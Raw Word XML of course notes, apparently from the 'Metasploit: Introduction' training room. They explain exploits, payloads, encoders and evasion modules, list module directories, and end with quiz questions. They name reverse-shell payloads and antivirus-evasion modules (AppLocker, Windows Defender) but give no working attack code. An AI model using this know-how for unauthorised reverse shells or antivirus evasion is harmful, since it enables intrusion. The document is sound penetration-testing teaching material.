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3F5B" w14:textId="21DC76FF" w:rsidR="002237B9" w:rsidRPr="0065127F" w:rsidRDefault="003F210C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065127F">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0065127F">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploit: Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B39DD4B" w14:textId="77777777" w:rsidR="003F210C" w:rsidRDefault="003F210C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:hAnsi="Ubuntu"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6203A4BE" w14:textId="77777777" w:rsidR="003F210C" w:rsidRPr="003F210C" w:rsidRDefault="003F210C" w:rsidP="003F210C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Introduction to Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3F15A"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is the most widely used exploitation framework. Metasploit is a powerful tool that can support all phases of a penetration testing engagement, from information gathering to post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEEBD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C0AE217"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has two main versions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1890424E"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Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: The commercial version that facilitates the automation and management of tasks. This version has a graphical user interface (GUI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C7BC8"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Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: The open-source version that works from the command line. This room will focus on this version, installed on the AttackBox and most commonly used penetration testing Linux distributions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3592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842399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Metasploit Framework is a set of tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. While the primary usage of the Metasploit Framework focuses on the penetration testing domain, it is also useful for vulnerability research and exploit development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8A1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348ECE4"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main components of the Metasploit Framework can be summarized as follows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4B9A1"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msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: The main command-line interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341FDF4"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Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: supporting modules such as exploits, scanners, payloads, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8306A"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Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Stand-alone tools that will help vulnerability research, vulnerability assessment, or penetration testing. Some of these tools are msfvenom, pattern_create and pattern_offset. We will cover msfvenom within this module, but pattern_create and pattern_offset are tools useful in exploit development which is beyond the scope of this module.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="762623E1"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03B529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This room will cover the main components of Metasploit while providing you with a solid foundation on how to find relevant exploits, set parameters, and exploit vulnerable services on the target system. Once you have completed this room, you will be able to navigate and use the Metasploit command line comfortably.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDD562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C401A4C"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You can deploy and use the AttackBox to complete tasks and answer the questions.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F210C">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD968D0" w14:textId="77777777" w:rsidR="002110A2" w:rsidRPr="002110A2" w:rsidRDefault="002110A2" w:rsidP="002110A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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lastRenderedPageBreak/>
        <w:t>Main Components of Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2296BCD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While using the Metasploit Framework, you will primarily interact with the Metasploit console. You can launch it from the AttackBox terminal using the </w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command. The console will be your main interface to interact with the different modules of the Metasploit Framework. Modules are small components within the Metasploit framework that are built to perform a specific task, such as exploiting a vulnerability, scanning a target, or performing a brute-force attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD776A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Before diving into modules, it would be helpful to clarify a few recurring concepts: vulnerability, exploit, and payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F073E8"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Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> A piece of code that uses a vulnerability present on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9B79CE"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Vulnerability:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> A design, coding, or logic flaw affecting the target system. The exploitation of a vulnerability can result in disclosing confidential information or allowing the attacker to execute code on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C843D"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Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> An exploit will take advantage of a vulnerability. However, if we want the exploit to have the result we want (gaining access to the target system, read confidential information, etc.), we need to use a payload. Payloads are the code that will run on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489FF0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Modules and categories under each one are listed below. These are given for reference purposes, but you will interact with them through the Metasploit console (msfconsole).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09E52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Auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA987D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Any supporting module, such as scanners, crawlers and fuzzers, can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD78E2"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6A342E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auxiliary/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704A78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auxiliary/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7406451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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F96901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analyze</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23073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bnat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7C3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client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066C5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cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6BA2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crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF4C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docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04847D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dos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D6C5B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6F6B01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example.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772D072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fileformat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578E00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fuzzers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59382E0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gather</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BDF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parser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C61FC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pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BCDE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scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF73A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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F430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sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF365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spoof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B876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sqli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D712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voip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F630E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vsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BEE4C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5AD45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2 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26903292"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Encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0CA4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Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CEB53"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Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C8759"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4051440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encoders/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB096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encoders/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24944D8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cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686EBB6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generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1797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mipsbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EE3B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mipsle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4221C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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1650F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ppc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C07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ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1024591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sparc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A0E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2E81EA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490BE3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82513F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717B43E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Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E964C4"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While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. On the other hand, “evasion” modules will try that, with more or less success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB7750"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CAD162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2 evasion/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738753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evasion/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5BA1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4CF0C8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applocker_evasion_install_util.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4A3B5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applocker_evasion_msbuild.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D421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applocker_evasion_presentationhost.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314EBC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applocker_evasion_regasm_regsvcs.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A5524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applocker_evasion_workflow_compiler.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552881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process_herpaderping.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3AF46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syscall_inject.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BDFEE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windows_defender_exe.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE90A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windows_defender_js_hta.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032C97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768D8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 directory, 9 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C556ECF"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Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488B5B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neatly organized by target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB0285D"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0094D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exploits/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEC400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exploits/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3561999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aix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F485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089835A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apple_ios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F63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bsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6D81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bsdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBCD5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dialup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5060259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example_linux_priv_esc.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E4C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551B700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example.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A575D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example_webapp.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7776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firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C754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freebsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BC38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hpux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F98649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irix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456B85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linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEA94C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mainframe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A9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7DA573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netware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F584C3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openbsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09701A5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osx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB059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qnx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472A6A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solaris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D712F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unix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A35A7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765660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807FB6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4 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545591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NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0078A98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NOPs (No OPeration) do nothing, literally. They are represented in the Intel x86 CPU family they are represented with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D04A7"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E7835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root@ip-10-10-135-188:/opt/metasploit-framework/embedded/framework/modules# tree -L 1 nops/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0325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nops/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B7A0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aarch64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA09B9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armle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E7FE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cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FE4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mipsbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C49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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E5293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ppc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A986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sparc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396603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tty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1997D24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706A6BF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3DBDE1B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88804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552F69A7"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Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4FD91"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Payloads are codes that will run on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB06B9B"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will leverage a vulnerability on the target system, but to achieve the desired result, we will need a payload. Examples could be; getting a shell, loading a malware or backdoor to the target system, running a command, or launching calc.exe as a proof of concept to add to the penetration test report. Starting the calculator on the target system remotely by launching the calc.exe application is a benign way to show that we can run commands on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1D018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Running command on the target system is already an important step but having an interactive connection that allows you to type commands that will be executed on the target system is better. Such an interactive command line is called a "shell". Metasploit offers the ability to send different payloads that can open shells on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D0B1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563BEEB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payloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441D25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payloads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2F81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adapters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45858F1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singles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD014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stagers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBE41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stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6C54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AFC09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4 directories, 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12135CE6"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You will see four different directories under payloads: adapters, singles, stagers and stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF8F7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Adapters:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> An adapter wraps single payloads to convert them into different formats. For example, a normal single payload can be wrapped inside a Powershell adapter, which will make a single powershell command that will execute the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F8CA5"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Singles:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10134334"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Stagers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads. “Staged payloads” will first upload a stager on the target system then download the rest of the payload (stage). This provides some advantages as the initial size of the payload will be relatively small compared to the full payload sent at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E05CA4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Stages: </w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Downloaded by the stager. This will allow you to use larger sized payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2DDBF6"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Metasploit has a subtle way to help you identify single (also called “inline”) payloads and staged payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C41D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generic/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757786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windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3CFD5"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Both are reverse Windows shells. The former is an inline (or single) payload, as indicated by the “_” between “shell” and “reverse”. While the latter is a staged payload, as indicated by the “/” between “shell” and “reverse”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A38D6DF"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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198279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36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6532CE80"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Post modules will be useful on the final stage of the penetration testing process listed above, post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6928E2C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p>
    <w:p w14:paraId="609019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334C1B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post/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F9074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post/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198778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aix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D1B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5A72B7D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apple_ios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E041E0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bsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFFF7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firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBBAD5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hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F654B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linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C2C4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5ADC2E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networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE595D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osx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2839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solaris</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786E34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6DE493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AC649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12 directories, 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B5D2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If you wish to familiarize yourself further with these modules, you can find them under the modules folder of your Metasploit installation. For the AttackBox these are under /opt/metasploit-framework/embedded/framework/modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B527843" w14:textId="77777777" w:rsidR="002110A2" w:rsidRPr="002110A2" w:rsidRDefault="002110A2" w:rsidP="002110A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2110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Answer the questions below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC984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taking advantage of a flaw on the target system?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAB1E2" w14:textId="31F738B5"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1F01F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pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId6" w:name="DefaultOcxName" w:shapeid="_x0000_i1047"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D171FFD"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0B33148A"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that runs on the target system to achieve the attacker's goal?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A7ADA0" w14:textId="2BAFF183"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28814F0F">
          <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <w:control r:id="rId8" w:name="DefaultOcxName1" w:shapeid="_x0000_i1051"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCB581"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5A8C02A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are self-contained payloads called?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484EDD58" w14:textId="64A53E58"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03C2BBF5">
          <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <w:control r:id="rId10" w:name="DefaultOcxName2" w:shapeid="_x0000_i1055"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E4B8B"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31F4CD6B"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Is "</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>windows/x64/pingback_reverse_tcp" among singles or staged payload?</w:t>
      </w:r>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17794502" w14:textId="1E6DA3C3"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60B160BF">
          <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <w:control r:id="rId12" w:name="DefaultOcxName3" w:shapeid="_x0000_i1059"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="22592DFA" w14:textId="77777777" w:rsidR="002110A2" w:rsidRPr="00146E29" w:rsidRDefault="002110A2" w:rsidP="002110A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002110A2">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
